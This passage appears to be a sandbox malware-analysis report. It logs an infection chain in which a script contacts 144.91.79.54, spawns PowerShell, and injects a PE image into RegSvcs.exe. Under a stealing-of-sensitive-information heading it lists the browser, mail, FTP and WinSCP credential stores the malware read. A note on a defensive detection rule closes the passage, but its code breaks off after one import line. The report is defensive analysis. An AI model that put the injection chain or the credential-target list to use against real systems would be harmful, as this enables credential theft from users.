                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\wscript.exe Dropped file: Do While compteurBoucles < 10000 ' Limit the iterations for demonstration WScript.Sleep 10000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3817
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6101
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5772
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2449
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1134
                  Source: C:\Windows\System32\wscript.exe TID: 6556 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\wscript.exe TID: 3228 Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568 Thread sleep count: 5772 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4204 Thread sleep count: 3910 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep time: -18446744073709540s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98824
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98493
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98391
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98266
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98031
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                  Source: wermgr.exe, 0000000B.00000003.2478101574.0000011788FB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm=%SystemRoot%\system32\mswsock.dll87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe" />
                  Source: wermgr.exe, 0000000B.00000002.2488933171.000001178900E000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000B.00000003.2487351854.000001178900E000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000B.00000003.2487739456.000001178900E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
                  Source: RegSvcs.exe, 00000008.00000002.3316811500.0000000005A30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                  Source: wermgr.exe, 0000000B.00000002.2488688738.0000011788FB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm=PS
                  Source: wscript.exe, 00000000.00000003.2099439406.000001E896739000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075194124.000001E896745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103295668.000001E896741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89673F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101127670.000001E896741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe Network Connect: 144.91.79.54 80
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 370000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 370000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 372000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3AC000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3AE000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 58D008
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Yara matches (first signature in this section), sources:
  dump.pcap (type: PCAP)
  8.2.RegSvcs.exe.370000.0.unpack (type: UNPACKEDPE)
  00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
  00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
  00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
  Process Memory Space: RegSvcs.exe PID: 6176 (type: MEMORYSTR)
Credential-store access by C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:
  Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
  File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
  File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
  File opened: C:\FTP Navigator\Ftplist.txt
  File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 entries)
  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
  Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara matches (second signature in this section), sources:
  8.2.RegSvcs.exe.370000.0.unpack (type: UNPACKEDPE)
  00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
  00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
  Process Memory Space: RegSvcs.exe PID: 6176 (type: MEMORYSTR)
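The file and registry targets listed above are the stealer's credential-store checklist, read by a process (RegSvcs.exe) that has no business with any of them. As an added example, not part of the Joe Sandbox report and not AgentTesla's or Joe Security's code, the Python below turns that list into a triage rule over process file/registry access events: each path or key is mapped to a store family, and a process is flagged when it is a known .NET injection host (RegSvcs.exe is the one seen here; RegAsm.exe, InstallUtil.exe and MSBuild.exe are assumed additions) or when it reads three or more families it does not own. The owner mapping, the event tuple layout and the sample events are assumptions; the sample events are constructed from the entries above plus a benign Chrome control.

```python
import re

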